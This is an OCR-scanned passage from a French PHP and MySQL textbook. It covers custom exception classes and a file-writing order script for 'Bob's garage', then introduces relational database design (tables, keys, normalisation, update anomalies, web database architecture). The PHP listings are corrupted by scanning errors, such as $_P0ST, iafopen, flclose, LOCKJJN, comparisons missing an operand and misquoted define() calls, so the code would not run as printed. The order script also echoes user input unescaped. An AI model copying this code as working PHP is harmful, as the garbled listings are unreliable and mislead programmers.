. "</strong> : " . $this->getMessage ( ) ."<br />" . " dans " 
. $this->getFile( ) . " en ligne " . $this->getLine( ) 
. "</td> 
</tr> 
</table><br />"; 

} 

} 

try { 

throw new MonException ( "Une erreur terrible s'est produite", 42); 

} 

catch (MonException $m) { 
echo $m; 

} 



?> 
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Dans ce code, vous declarez une nouvelle classe d'exception appelee MonException qui 
etend la classe de base Exception. La difference entre cette classe et la classe Excep 

tion tient a ce que vous redefinissez la methode toString( ) afin de proposer une 

sortie amelioree de l'exception. La sortie resultant de l'execution de ce code est presentee 
a la Figure 7.2. 



Figure 7.2 

La classe myException 
fournit un affichage 
ameliore des exceptions. 
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Cet exemple est plutot simple. Dans la section suivante, nous allons examiner des 
moyens de creer differentes exceptions pour gerer differentes categories d'erreur. 



Exceptions dans le garage de Bob 

Le Chapitre 2 vous a montre comment les donnees des commandes du garage de Bob 
pouvaient etre stockees dans un fichier plat. Vous savez que les E/S sur fichier (en fait, 
tout type d'E/S) sont un secteur des programmes ou des erreurs interviennent souvent. 
II s'agit ainsi d'un bon domaine pour mettre en application la gestion des exceptions. 

En revenant au code d'origine, vous pouvez voir que trois choses peuvent mal se passer 
avec l'ecriture dans le fichier : le fichier ne peut pas etre ouvert, un verrou ne peut pas 
etre obtenu ou le fichier n'est pas accessible en denture. Nous avons done cree une 
classe d'exception pour chacune de ces possibilites, comme le montre le Listing 7.4. 

Listing 7.4 : exceptions_fichiers.php — Exceptions liees aux E/S de fichier 

<?php 

class ExceptionOuvertureFichier extends Exception { 

public function toString() { 

return " ExceptionOuvertureFichier " . $this->getCode ( ) 

. ": " . $this->getMessage( ) . "<br />" . " dans " 
. $this->getFile( ) . " en ligne " . $this->getLine( ) 
. "<br />"; 



} 



} 



class ExceptionEcritureFichier extends Exception { 

public function toString() { 

return "ExceptionEcritureFichier " . $this->getCode ( ) 

. ": " . $this->getMessage( ) . "<br />" . " dans 



Chapitre 7 



Gestion des exceptions 211 



. $this->getFile( ) . " en ligne " . $this->getLine( ) 
. "<br />"; 

} 

} 

class ExceptionVerrouillageFichier extends Exception { 

public function toString() { 

return "ExceptionVerrouillageFichier " . $this->getCode( ) 
. ": " . $this->getMessage( ) . "<br />" . " dans " 
. $this->getFile( ) . " en ligne " . $this->getLine( ) 
. "<br />"; 

} 

} 

?> 



Ces sous-classes de Exception ne font rien de particulierement interessant. En fait, 
pour le besoin de cette application, vous pourriez les conserver vides ou utiliser la 
classe Exception fournie. Nous avons cependant fourni pour chacune des sous-classes 
une methode toString ( ) qui indique le type d'exception survenu. 

Nous avons egalement reecrit le fichier processorder.php du Chapitre 2 afin d'y inclure 
l'utilisation des exceptions. La nouvelle version est presentee dans le Listing 7.5. 

Listing 7.5 : processorder.php — Script de traitement des commandes du garage 
de Bob incluant la gestion des exceptions 



<?php 

require_once( "exceptions_fichiers.php" ) ; 

// Cree des noms de variables abregees 
$qte_pneus = $_P0ST[ ' qte_pneus ' ] ; 
$qte_huiles = $_P0ST[ ' qtejiuiles ' ] ; 
$qte_bougies = $_P0ST[ ' qte_bougies ' ] ; 
$adresse = $_P0ST[ ' adresse ' ] ; 

$D0CUMENT_R00T = $_SERVER[ ' DOCUMENT_ROOT ' ] ; 

?> 

<html> 
<head> 

<title>Le garage de Bob - Ré sultats de la commande</title> 
</head> 
<body> 

<h1>Le garage de Bob</h1> 

<h2>R&eacute ; sultats de la commande</h2> 

<?php 

$date = date('H:i, \l\e j-m-Y'); 

echo ' <p>Commmande trait&eacute ; e à '; 

echo $date; 

echo ' </p> ' ; 

echo ' <p>Recapitulatif de votre commande :</p>'; 
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$qte_totale = 0; 

$qte_totale = $qte_pneus + $qte_huiles + $qte_bougies; 

echo 'Articles command&eacute ; s : '. $qte_totale . '<br />'; 

if( $qte_totale == 0) 
{ 

echo "Vous n'avez rien commandé !<br />"; 
} 

else 
{ 

if ( $qte_pneus > ) 

echo $qte_pneus . ' pneus<br />'; 
if ( $qte_huiles > ) 

echo $qte_huiles . " bidons d'huile<br />"; 
if ( $qte_bougies > ) 

echo $qte_bougies .' bougies<br />'; 

} 

$montant_total = 0.00; 

define ( 'PRIX_PNEUS' , 100); 
define ( 1 PRIX_HUILES ' , 10); 
define ( ' PRIX_BOUGIES' , 4); 

$montant_total = $qte_pneus * PRIX_PNEUS 

+ $qte_huiles * PRIX_HUILES 
+ $qte_bougies * PRIX_BOUGIES; 

$montant_total = number_f ormat ($montant_total, 2, ' '); 

echo '<p>Total de la commande : ' . $montant_total . '</p>'; 
echo '<p>Adresse de livraison : ' . $adresse . '</p>'; 

$chaine_sortie = "$date\t$qte_pneus pneus\t$qte_huiles bidons " . 

"d ' huile\t$qte_bougies bougies\t$montant_total €\t" . 
"$adresse\n" ; 

// Ouverture du fichier en mode ajout 
try { 

if (! ($fp = iafopen("$DOCUMENT_ROOT/. ./orders/orders, txt", 'ab'))) { 
throw new ExceptionOuvertureFichier( ) ; 

} 

if (!flock($fp, L0CK_EX)) { 

throw new ExceptionVerrouillageFichier ( ) ; 

} 

if ( !fwrite($fp, $chaine_sortie , strlen ($chaine_sortie) ) ) { 
throw new ExceptionEcritureFichier( ) ; 

} 

flock($fp, LOCKJJN); 
flclose($fp) ; 

echo '<p>Commande sauvegardée.</p>' ; 
} 

catch (ExceptionOuvertureFichier $ex_of) { 
echo "<p><strong>Impossible d'ouvrir le fichier des commandes. 

Contactez le webmaster pour plus de renseignements . </strong></p>" ; 

} 
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catch (Exception $ex) { 

echo "<p><strong>Nous ne pouvons pas traiter votre commande 
pour le moment. Reessayez plus tard .</strong></p>" ; 

} 

?> 

</body> 
</html> 



Comme vous pouvez le constater, la section des E/S de fichier de ce script est encapsu- 
lee dans un bloc try. En general, le bon usage en matiere de programmation consiste a 
utiliser des blocs try de petite taille et a capturer les exceptions appropriees a la fin de 
chacun d'entre eux. Le code de gestion des exceptions est ainsi plus facile a ecrire et a 
maintenir car vous pouvez voir ce que vous gerez. 

Si vous ne pouvez pas ouvrir le fichier, vous levez une ExceptionOuvertureFichier ; 
si vous ne pouvez pas verrouiller le fichier, vous levez une ExceptionVerrouillage 
Fichier ; enfin, si vous ne pouvez pas ecrire dans le fichier, vous levez une Exception 
EcritureFichier. 

Examinez les blocs catch. A des fins illustratives, nous n'en utilisons que deux : l'un 
pour gerer les ExceptionOuvertureFichier, 1' autre pour gerer les Exception. Les 
autres exceptions heritant de Exception, elles seront done capturees par le second bloc 
catch. Les blocs catch sont mis en correspondance selon le meme principe que 
l'operateur instanceof. II s'agit d'une bonne raison d'etendre vos propres classes 
d' exception a partir d'une seule classe. 

Attention : si vous levez une exception pour laquelle vous n'avez pas ecrit de bloc 
catch correspondant, PHP signalera une erreur fatale ! 

Exceptions et autres mecanismes de gestion des erreurs en PHP 

Outre le mecanisme de gestion des exceptions traite dans ce chapitre, PHP dispose d'un 
support de gestion des erreurs complexe, que nous etudierons au Chapitre 24. Le 
processus de levee et de gestion des exceptions n'interfere pas avec ce mecanisme de 
gestion des erreurs et ne l'empeche pas de fonctionner. 

Dans le Listing 7.5, vous remarquerez que l'appel a fopen() est toujours prefixe de 
l'operateur de suppression d'erreur @. Si cet appel echoue, PHP emet un avertissement 
qui peut etre signale ou non, ou journalise ou non selon les reglages definis dans 
php.ini. Ces parametres sont traites en detail dans le Chapitre 24, mais vous devez 
savoir que cet avertissement sera toujours emis, independamment du fait que vous 
leviez ou non une exception. 
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Lectures complementaires 

La gestion des exceptions etant recente en PHP, il n'y a que peu d'ecrits sur ce sujet. En 
revanche, on trouve d'abondantes informations sur la gestion des exceptions. Sun, 
notamment, propose un excellent didacticiel qui explique ce que sont les exceptions et 
les raisons qui pourraient vous amener a les utiliser (dans l'optique d'une programma- 
tion en Java, evidemment). Ce didacticiel est disponible a l'adresse http:// 
java.sun.com/docs/books/tutorial/essential/exceptions/handling.html. 

Prochaine etape 

La prochaine etape de ce livre concerne MySQL. Nous montrerons comment creer et 
remplir une base de donnees MySQ, puis nous mettrons en ceuvre ce que vous avez 
appris sur PHP afm de pouvoir acceder a votre base de donnees depuis le Web. 
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8 


Conception d'une base de donnees web 


9 
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10 
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11 


Acces a une base de donnees MySQL a partir du Web 
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12 
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13 
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8 



Conception d'une base 
de donnees web 

Maintenant que vous connaissez les elements essentiels de PHP, nous allons nous inte- 
resser a 1' integration d'une base de donnees dans vos scripts. Au Chapitre 2, nous avons 
presente les avantages de l'utilisation d'une base de donnees relationnelle a la place 
d'un fichier plat. Voici un resume des atouts des SGBDR (systemes de base de donnees 
relationnelles) : 

■ lis permettent d'acceder aux donnees plus rapidement qu'avec des fichiers plats. 

■ On peut les interroger tres facilement pour recuperer des ensembles de donnees 
satisfaisant certains criteres. 

■ lis possedent des mecanismes integres permettant de gerer les acces simultanes, 
pour que le programmeur, c'est-a-dire vous-meme, n'ait pas besoin de s'en 
occuper. 

■ lis permettent d'acceder directement aux donnees. 

■ lis disposent d'un systeme de privileges integre. 

Concretement, l'utilisation d'une base de donnees relationnelle permet de repondre 
rapidement et simplement a des questions comme les suivantes : quelle est l'origine de 
vos clients, quels sont les produits qui se vendent le mieux ou quelle categorie de clients 
depense le plus d' argent ? Ces informations pourront vous aider a ameliorer votre site 
pour attirer un plus grand nombre d'utilisateurs et les ndeliser, et il serait bien plus diffi- 
cile de les obtenir a partir de fichiers plats. 
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Dans cette partie du livre, nous utiliserons le SGBDR MySQL mais, avant d'etudier ses 
caracteristiques specifiques, nous devons presenter : 

■ les concepts et la terminologie des bases de donnees relationnelles ; 

■ la conception d'une base de donnees web ; 

■ 1' architecture d'une base de donnees web. 

Voici un resume des prochains chapitres : 

Le Chapitre 9 presente la configuration de base dont vous aurez besoin pour connec- 
ter votre base de donnees MySQL sur le Web. Vous apprendrez a creer des utilisa- 
teurs, des bases de donnees, des tables et des index. Vous decouvrirez egalement les 
differents moteurs de stockage de MySQL. 

■ Le Chapitre 10 explique comment interroger la base de donnees, ajouter, supprimer 
et modifier des enregistrements a partir de la ligne de commande. 

■ Le Chapitre 1 1 explique comment connecter PHP et MySQL pour pouvoir adminis- 
trer votre base de donnees a partir d'une interface web. Nous presenterons deux 
methodes : l'extension mysqli de PHP et la couche d' abstraction PEAR : DB. 

Le Chapitre 12 couvre en detail 1' administration de MySQL, notamment le systeme 
des privileges, la securite et l'optimisation. 

■ Le Chapitre 13 decrit les moteurs de stockage et traite notamment des transactions, 
des recherches textuelles et des procedures stockees. 

Concepts des bases de donnees relationnelles 

Les bases de donnees relationnelles sont, de loin, les bases de donnees les plus utilisees. 
Elles font appel a de solides bases theoriques en algebre relationnelle. Si vous n'avez 
heureusement pas besoin de comprendre cette theorie relationnelle pour pouvoir utiliser 
une base de donnees relationnelle, vous devez en revanche connattre quelques concepts 
essentiels des bases de donnees. 

Tables 

Les bases de donnees relationnelles sont composees de relations, que Ton appelle plus 
couramment des tables. Une table est, comme son nom l'indique, un ensemble de 
donnees organisees de facon tabulaire. Si vous avez deja utilise une feuille de calcul 
dans un tableur, vous avez deja utilise une table. 

A la Figure 8.1, vous trouverez un exemple de table qui contient les noms et les adresses 
des clients d'une librairie, Book-O-Rama. 
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CLIENTS 



IDCIient 


Nom 


Adresse 


Ville 


1 


Julie Dupont 


25 rue neuve 


Toulouse 


2 


Alain Wong 


147 avenue Foch 


Paris 


3 


Michelle Arthur 


19 rue blanche 


Bordeaux 



Figure 8. 1 

Les informations concernant les clients de Book-O-Rama sont enregistrees dans une table. 

Cette table possede un nom (Clients), un certain nombre de colonnes (correspondant 
chacune a un type d' information) et plusieurs lignes correspondant aux differents 
clients. 

Colonnes 

Chaque colonne possede un nom unique et contient differentes donnees. En outre, 
chaque colonne est associee a un type de donnees particulier. Par exemple, dans la table 
Clients de la Figure 8.1, vous pouvez constater que la colonne IDCIient contient des 
entiers, alors que les trois autres contiennent des chaines de caracteres. Les colonnes 
sont parfois appelees champs ou attributs. 

Lignes 

Chaque ligne de cette table represente un client particulier. Grace au format tabulaire, 
toutes ces lignes possedent les memes attributs. Les lignes peuvent egalement etre 
appelees enregistrements ou tuples. 

Valeurs 

Chaque ligne est formee d'un ensemble de valeurs particulieres correspondant a chaque 
colonne. Le type de chaque valeur doit correspondre au type de la colonne dans laquelle 
elle se trouve. 

Cles 

II nous faut ensuite un moyen d' identifier chaque client. Generalement, les noms des 
clients ne sont pas tres adaptes : si vous possedez un nom assez repandu, vous avez 
probablement deja compris pourquoi. Prenons, par exemple, le nom Julie Dupont dans 
la table Clients. En ouvrant un annuaire telephonique, on se rend aussitot compte qu'il 
existe un grand nombre de personnes possedant ce nom. 
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Nous pouvons identifier Julie de plusieurs manieres. On peut supposer qu'il s'agit de la 
seule Julie Dupont habitant a son adresse. Cependant, le fait de designer ce client par 
"Julie Dupont, 25 rue neuve, Toulouse" est assez penible et un peu trop administratif. 
Cela implique egalement d'utiliser plusieurs colonnes dans la table. 

Ici, nous avons choisi une approche que vous reprendrez probablement dans vos appli- 
cations : nous utilisons un identificateur unique (IDClient) pour chaque client. Ce prin- 
cipe est assez courant puisque vous possedez deja un numero de compte bancaire ou un 
numero de securite sociale qui sont uniques. Ces numeros permettent d'enregistrer les 
details qui vous concernent dans une base de donnees de facon plus efficace et plus 
simple. De plus, ce numero etant artificiel et cree de toutes pieces, nous pouvons garan- 
tir qu'il sera unique. Dans la pratique, il existe peu d' informations qui possedent cette 
propriete, meme si Ton en utilise plusieurs conjointement. 

La colonne d'identification d'une table est appelee cle, ou cle primaire. Une cle peut 
egalement etre repartie sur plusieurs colonnes. Si, par exemple, nous avions choisi 
d'identifier Julie par "Julie Dupont, 25 rue neuve, Toulouse", la cle serait formee des 
colonnes Norn, Adresse et Ville ; dans ce cas, il serait impossible de garantir son 
unicite. 



CLIENTS 



IDClient 


Norn 


Adresse 


Ville 


1 


Julie Dupont 


25 rue neuve 


Toulouse 


2 


Alain Wong 


147 avenue Foch 


Paris 


3 


Michelle Arthur 


19 rue blanche 


Bordeaux 



COMMANDES 



IDCommande 


IDClient 


Montant 


Date 


1 




3 




27.50 


02Avr 2007 


2 




1 




12.99 


15 Avr 2007 


3 




2 




74.00 


19 Avr 2007 


4 




3 




6.99 


01 Mai 2007 



Figure 8.2 

Chaque commande de la table Commandes fait reference a un client dans la table Clients. 
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Les bases de donnees contiennent generalement plusieurs tables et se servent des cles 
comme d'une reference d'une table a une autre. Dans la Figure 8.2, nous avons ajoute 
une seconde table dans la base de donnees, afin de stacker les commandes effectuees 
par les clients. Chaque ligne de la table Commandes represente une seule commande, 
effectuee par un seul client, identifie par son IDClient. Si, par exemple, nous exami- 
nons la commande dont l'lDCommande est 2, nous pouvons voir qu'elle a ete effectuee 
par le client dont 1' IDClient est 1. Si nous nous reportons ensuite a la table Clients, 
nous pouvons constater que cet identifiant designe Julie Dupont. 

Dans la terminologie des bases de donnees relationnelles, cette relation est appelee une 
cle etrangere. IDClient est la cle primaire dans Clients mais, lorsqu'elle apparait dans 
une autre table comme Commandes, elle devient une cle etrangere dans cette table. 

Vous vous demandez peut-etre pourquoi nous avons choisi d' avoir deux tables differen- 
tes et pourquoi nous ne nous sommes pas contentes d'enregistrer l'adresse de Julie dans 
Commandes ? Nous expliquerons ce choix dans la prochaine section. 

Schemas 

L' ensemble des structures des tables d'une base de donnees est appele schema de la 
base de donnees. II s'agit d'une sorte de plan. Un schema doit representer les tables 
ainsi que leurs colonnes, la cle primaire de chaque table et toutes les cles etrangeres. II 
ne contient aucune donnee, mais vous pouvez choisir de presenter quelques donnees 
typiques avec votre schema pour expliquer son fonctionnement. Un schema peut etre 
represente par un diagramme informel comme celui des figures precedentes, par un 
diagramme entites-relations (que nous ne presenterons pas dans ce livre) ou, plus 
simplement, sous forme textuelle, comme ici : 

Clients (IDClient , Nom, Adresse, Ville) 
Commandes ( IDCommande , IDClient, Montant, Date) 

Les termes soulignes dans ce schema sont les cles primaires de la relation dans laquelle 
ils apparaissent, tandis que les termes en italique sont les cles etrangeres de la relation 
dans laquelle ils apparaissent en italique. 

Relations 

Les cles etrangeres represented une relation entre des donnees de deux tables. Par 
exemple, le lien de la table Commandes vers la table Clients represente une relation 
entre une ligne de Commandes et une ligne de Clients. 

II existe trois principaux types de relations dans une base de donnees relationnelle. Ces 
relations peuvent etre classees en fonction du nombre d'elements intervenant dans 
chaque membre de la relation : un-vers-un, un-vers-plusieurs, ou plusieurs-vers- 
plusieurs. 
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Une relation un-vers-un signifie que la relation fait intervenir un seul element de chaque 
cote. Par exemple, si nous avions place les adresses dans une autre table que Clients, il 
existerait une relation un-vers-un entre elles. Vous pourriez alors avoir une cle etrangere 
de Addresses vers Clients ou dans l'autre sens (cette reciprocite n'est pas necessaire). 

Dans une relation un-vers-plusieurs, une ligne d'une table est associee a plusieurs 
lignes d'une autre table. Dans notre exemple, un client de la table Clients peut effec- 
tuer plusieurs commandes, qui apparaitront alors dans la table Commandes. Dans ce type 
de relation, la table dont plusieurs lignes participent a la relation possede une cle etran- 
gere vers l'autre table. Ici, nous avons place IDClient dans la table Commandes pour 
illustrer cette relation. 

Dans une relation plusieurs-vers-plusieurs, plusieurs lignes d'une table sont associees a 
plusieurs lignes d'une autre table. Par exemple, si nous prenons l'exemple de deux 
tables, Livres et Auteurs, il se peut qu'un livre ait ete ecrit par deux auteurs, chacun 
d'entre eux ayant ecrit d'autres livres, soit independamment, soit avec d'autres auteurs. 
Ce type de relation est generalement assez complexe, c'est pourquoi il peut etre interes- 
sant de posseder les tables Livres, Auteurs et Livres Auteurs. Cette derniere table ne 
contiendra que les cles des autres tables sous forme de cles etrangeres, afin de connaitre 
les auteurs associes a chaque livre. 

Conception d'une base de donnees web 

Determiner quand vous avez besoin d'une nouvelle table et choisir ses cles peut etre 
considere comme un art. Vous trouverez dans d'autres livres beaucoup d' informations 
sur les diagrammes entites-relations et sur la normalisation des bases de donnees, qui 
depassent le cadre de cet ouvrage. Cependant, la plupart du temps, il suffit de respecter 
quelques principes de conception assez simples. Nous allons les presenter dans le 
contexte de la librairie Book-O-Rama. 

Penser aux objets reels que vous modelisez 

Lorsque vous creez une base de donnees, vous modelisez generalement des objets du 
monde reel, les relations qui existent entre eux et vous enregistrez des informations sur 
ces objets et ces relations. 

Generalement, chaque type d'objet reel que vous modelisez a besoin de sa propre table. 
En effet, dans notre exemple, il faut enregistrer les memes informations pour tous les 
clients. Si un ensemble de donnees possede les memes proprietes, vous pouvez 
commencer par creer une table correspondant a ces donnees. 

Dans l'exemple de la librairie Book-O-Rama, nous devons enregistrer des informations 
sur les clients, les livres a vendre et les details de chaque commande. Tous les clients 
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possedent un nom et une adresse. Les commandes sont caracterisees par une date, un 
montant total et un ensemble de livres achetes. Chaque livre possede un code ISBN, 
un auteur, un titre et un prix. 

D'apres ces caracteristiques, nous pouvons creer au moins trois tables dans cette base 
de donnees : Clients, Commandes et Livres. Ce schema initial est represente par la 
Figure 8.3. 



CLIENTS 



IDCiient 


Nom 


Adresse 


Ville 


1 


Julie Dupont 


25 rue neuve 


Toulouse 


2 


Alain Wong 


147 avenue Foch 


Paris 


3 


Michelle Arthur 


19 rue blanche 


Bordeaux 



COMMANDES 



IDCommande 


IDCiient 


Montant 


Date 


1 




3 




27.50 


02 Avr 2007 


2 




1 




12.99 


15 Avr 2007 


3 




2 




74.00 


19 Avr 2007 


4 




3 




6.99 


01 Mai 2007 



LIVRES 



ISBN 


Auteur 


Titre 


Prix 


672 31697 8 


Michael Morgan 


Java 2 for Professional Developers 


34.99 


672 31745 1 


Thomas Down 


Installing GNU/Linux 


24.99 


672 31509 2 


Pruitt.et al. 


Teach Yourself GIMP in 24 Hours 


24.99 



Figure 8.3 

Le schema initial contient les tables Clients, Commandes et Livres. 



Pour l'instant, il est impossible de deviner, a partir du modele, les livres qui correspondent 
a chaque commande. Nous allons nous en occuper maintenant. 
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Eviter d'enregistrer des informations redondantes 

Plus haut, nous nous sommes demande pourquoi ne pas enregistrer l'adresse de Julie 
Smith dans la table Commandes . 

Si Julie achete plusieurs livres chez Book-O-Rama, cela reviendrait a enregistrer 
plusieurs fois les informations qui la concernent. Au cours du temps, la table Commandes 
pourrait alors ressembler a celui de la Figure 8.4. 



IDCommande 


Montant 


Date 


IDCIient 


Norn 


Adresse 


Ville 


12 


199.50 


25 Avr 2007 


1 


Julie Dupont 


25 rue neuve 


Toulouse 


13 


43.00 


29 Avr 2007 


1 


Julie Dupont 


25 rue neuve 


Toulouse 


14 


15.99 


30 Avr 2007 


1 


Julie Dupont 


25 rue neuve 


Toulouse 


15 


23.75 


01 Mai 2007 


1 


Julie Dupont 


25 rue neuve 


Toulouse 



Figure 8.4 

Une conception de base de donnees qui enregistre des informations redondantes gaspille 
de I'espace disque et peut entrainer des anomalies dans les donnees. 

Cette conception pose essentiellement deux problemes. 

■ Elle gaspille de I'espace. Pourquoi enregistrer trois fois les donnees concernant 
Julie, alors qu'il suffit de ne les enregistrer qu'une seule fois ? 

■ Cette approche peut entrainer des anomalies dans les mises a jour des informations, 
c'est-a-dire des situations dans lesquelles certaines informations de la base de 
donnees sont modinees avec, pour consequence, une base de donnees dans un etat 
incoherent. L'integrite des donnees est violee et il est alors impossible de distinguer 
les donnees correctes des donnees incorrectes. Cette situation implique generalement 
des pertes d' informations. 

II convient d'eviter trois types d'anomalies : les anomalies de modifications, d'insertions 
et de suppressions. 

H Si Julie demenage pendant qu'elle a une commande en cours, il faut mettre a jour 
son adresse a trois endroits au lieu d'un seul, ce qui represente trois fois plus de 
travail. II est assez facile d'oublier cette tache et de ne changer son adresse qu'a un 
seul endroit, ce qui entrainera des incoherences dans la base de donnees (une 
situation qu'il faut eviter a tout prix). Ce type de probleme est appele anomalie de 
modification, puisqu'il a lieu pendant une modification de la base de donnees. 

■ Nous devons saisir les details concernant Julie a chaque fois qu'elle effectue 
une commande et verifier que ces details sont coherents avec les donnees exis- 
tant deja dans la table. Si nous omettons cette verification, il se peut que nous 
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nous retrouvions avec deux lignes contenant des informations differentes sur 
Julie. Par exemple, l'une de ces lignes peut indiquer que Julie habite a Toulouse 
et une autre, qu'elle habite a Blagnac. Ce type d'erreur est appele anomalie 
d'insertion, puisqu'elle a lieu lorsque de nouvelles donnees sont inserees dans 
les tables. 

Le troisieme type d' anomalie est appele anomalie de suppression, puisque ces 
anomalies surviennent lorsque des donnees sont supprimees de la base de donnees. 
Par exemple, imaginons que lorsqu'une commande est terminee nous la supprimons 
de la base de donnees. Lorsque toutes les commandes de Julie ont ete traitees, elles 
sont toutes supprimees du tableau Commandes. Cela signifie done que l'adresse de 
Julie n'existe plus dans notre base de donnees. II est alors impossible de lui envoyer 
des publicites et, la prochaine fois qu'elle souhaitera passer une commande, il 
faudra rassembler a nouveau toutes les informations qui la concernent. 

Les bases de donnees sont normalement cogues pour qu'aucune de ces anomalies ne 
puisse avoir lieu. 

Utiliser des valeurs de colonne atomiques 

Utiliser des valeurs de colonne atomiques signifie que, dans chaque attribut de chaque 
ligne, vous ne stockez qu'un seul element. Par exemple, si nous devons connaitre tous 
les livres associes a chaque commande, il existe plusieurs approches differentes. 

Nous pouvons ajouter une colonne dans la table Commandes qui fournira la liste de tous 
les livres commandes (voir la Figure 8.5). 



COMMANDES 



IDCommande 


IDCIient 


Montant 


Date 


Livres Commandes 


1 


3 


27.50 


02 Avr 2007 


672 31697 8 


2 


1 


12.99 


15 Avr 2007 


672 31745 1.0 672 31509 2 


3 


2 


74.00 


19 Avr 2007 


672 31697 8 


4 


3 


6.99 


01 Mai 2007 


672 31745 1. 672 31509 2. 672 31697 8 



Figure 8.5 

Avec cette architecture, I'attribut Livres commandes de chaque ligne contient plusieurs valeurs. 

Cette organisation n'est pas tres judicieuse pour plusieurs raisons. Elle revient a imbri- 
quer une table complete dans une colonne, une table qui associe les commandes aux 
livres. II est alors plus difficile de repondre a des questions comme : "Combien d'exem- 
plaires du livre Java 2 pour les professionnels ont ete commandes ?" Le systeme ne 
peut plus se contenter de compter les champs qui correspondent a cette requete ; il doit 
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analyser la valeur de chaque attribut pour verifier si elle contient la chaine de caracteres 
recherchee. 

Au lieu d'inserer une table a l'interieur d'une autre table, il suffit en fait de creer un 
nouvelle table, Livres Commandes, comme celle de la Figure 8.6. 

Figure 8.6 LIVRES COMMANDES 



Cette architecture 
simplifie la recherche 
des livres qui ont ete 
commandes. 



IDCommande 


ISBN 


Quantite 


1 


672 31697 8 


1 


2 


672 31745 1 


2 


2 


672 31509 2 


1 


3 


672 31697 8 


1 


4 


672 31745 1 


1 


4 


672 31509 2 


2 


4 


672 31697 8 


1 



Cette table permet de creer une association entre la table Commandes et la table Livres. 
Ce type de table est assez repandu lorsqu'il existe une relation plusieurs-vers-plusieurs 
entre deux objets comme ici : une commande peut concerner plusieurs livres et un livre 
peut etre commande par plusieurs personnes. 

Choisir des des pertinentes 

Assurez-vous que les cles que vous choisissez sont uniques. Dans notre cas, nous avons 
cree des cles speciales pour les clients (iDClient) et pour les commandes (IDCommande) 
puisque ces objets du monde reel ne possedent pas necessairement un identificateur 
unique. En revanche, nous n' avons pas besoin de creer un identificateur unique pour les 
livres puisqu'il en existe deja un : le numero ISBN. Pour la table Livre Commandes, 
vous pourriez ajouter une cle supplemental, mais la combinaison des deux attributs 
IDCommande et ISBN est unique tant que plusieurs exemplaires d'un meme livre dans la 
meme commande sont traites sur une seule ligne. C'est pour cela que Livre Commandes 
possede une colonne Quantite. 

Penser aux questions que vous poserez a votre base de donnees 

II est essentiel de connaitre les questions auxquelles la base de donnees doit pouvoir 
repondre ("Quelles sont les meilleures ventes ?", par exemple). Assurez-vous que votre 
base contient toutes les donnees necessaries et que les liens appropries existent entre les 
differentes tables pour repondre correctement a vos questions. 
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Eviter les architectures ayant beaucoup d'attributs vides 

Si nous souhaitons ajouter des commentaires aux livres de la base de donnees, nous 
pouvons choisir entre deux approches differentes, presentees a la Figure 8.7. 



LIVRES 



ISBN 


Auteur 


Titre 


Prix 


Commentaire 


672 31697 8 


Michael Morgan 


Java 2 for Professional Developers 


34.99 




672 31745 1 


Thomas Down 


Installing GNU/Linux 


24.99 




672 31509 2 


Pruitt.et al. 


Teach Yourself GIMP in 24 Hours 


24.99 





COMMENTAIRES LIVRES 



ISBN 


Commentaire 







Figure 8.7 

Pour fournir des commentaires, nous pouvons ajouter une colonne Commentaire dans la table 
Livres ou ajouter une autre table, consacree aux commentaires. 

La premiere methode consiste a ajouter une colonne Commentaire dans la table Livres. 
De cette maniere, il existe un champ Commentaire pour chaque livre. Si la base de 
donnees contient beaucoup de livres, et si la personne qui redige les commentaires n'a 
pas l'intention de le faire pour chaque livre, il se peut que plusieurs lignes ne possedent 
aucune valeur associee a cet attribut. On parle dans ce cas de valeurs null. 

La presence de nombreuses valeurs null dans une base de donnees doit etre evitee car 
elles gaspillent l'espace de stockage et peuvent entrainer divers problemes lorsque vous 
calculez des totaux ou d'autres fonctions sur des colonnes numeriques. En outre, 
lorsqu'un utilisateur voit une valeur null dans une table, il ne peut pas savoir si la valeur 
de cet attribut n'a aucune signification, s'il s'agit d'une erreur dans la base de donnees 
ou s'il s'agit d'une donnee qui n'a pas encore ete saisie. 

Vous pouvez eviter tous ces problemes en utilisant la seconde architecture presentee a 
la Figure 8.7. Dans cette organisation, seuls les livres qui possedent un commentaire 
apparaissent dans la table Commentaires Livres, accompagnes de leur commentaire. 

Vous remarquerez que la premiere architecture implique qu'il ne peut y avoir qu'un 
commentaire par livre. Si vous souhaitiez pouvoir ajouter plusieurs commentaires pour 
le meme livre, il faut utiliser une relation un-a-plusieurs que seule la seconde architec- 
ture est capable de vous apporter. Cette derniere permet egalement de representer une 
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relation un-vers-un puisqu'il suffit d'utiliser 1'ISBN comme cle primaire dans la table 
Commentaires Livres. Pour representer une relation un-a-plusieurs, vous devez en 
revanche definir un identificateur unique pour chaque ligne de cette table. 

Recapitulatif sur les types de tables 

Les bases de donnees sont generalement composees de deux types de tables : 

■ Des tables simples qui decrivent des objets du monde reel. Ces tables peuvent egale- 
ment contenir des cles vers d'autres objets simples, pour lesquels il existe une relation 
un-vers-un ou un-vers-plusieurs. Un client peut, par exemple, passer plusieurs 
commandes, mais chaque commande est effectuee par un seul client. Par conse- 
quent, nous pouvons placer dans chaque commande une reference au client qui a 
effectue cette commande. 

■ Des tables de liaison qui decrivent des relations plusieurs-vers-plusieurs entre deux 
objets reels, comme la relation qui existe entre Commandes et Livres. Ces tables sont 
souvent associees a des transactions du monde reel. 

Architecture d'une base de donnees web 

Maintenant que nous avons presente 1' architecture interne d'une base de donnees, nous 
pouvons nous interesser a 1' architecture externe des systemes de bases de donnees web 
et presenter la methodologie permettant de developper ces systemes. 

Architecture 

Le fonctionnement fondamental d'un serveur web est presente a la Figure 8.8. Ce 
systeme est compose de deux objets : un navigateur web et un serveur web. Un lien 
de communication doit exister entre ces deux objets. Le navigateur effectue des 
requetes aupres du serveur, qui lui renvoie des reponses. Cette architecture est parfai- 
tement adaptee a un serveur qui fournit des pages statiques, mais celle qui permet de 
mettre en place des sites web faisant intervenir des bases de donnees est un peu plus 
complexe. 
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Figure 8.8 

La relation client/serveur entre un navigateur web et un serveur web necessite un lien 
de communication. 
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Les applications de bases de donnees web que nous allons mettre en oeuvre dans ce livre 
respectent une structure de base de donnees web generale, presentee a la Figure 8.9. 
L'essentiel de cette structure devrait deja vous sembler familier. 
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Figure 8.9 

L'architecture fondamentale des bases de donnees web est composee d'un navigateur web, 
d'un serveur web, d'un moteur de scripts et d'un serveur de bases de donnees. 

Une transaction de base de donnees web classique est composee des etapes numerotees 
a la Figure 8.9. Examinons ces etapes dans le contexte de la librairie Book-O-Rama. 

1. Le navigateur web d'un utilisateur envoie une requete HTTP pour une page web 
particuliere. Cette requete peut, par exemple, concerner tous les livres de Book-O- 
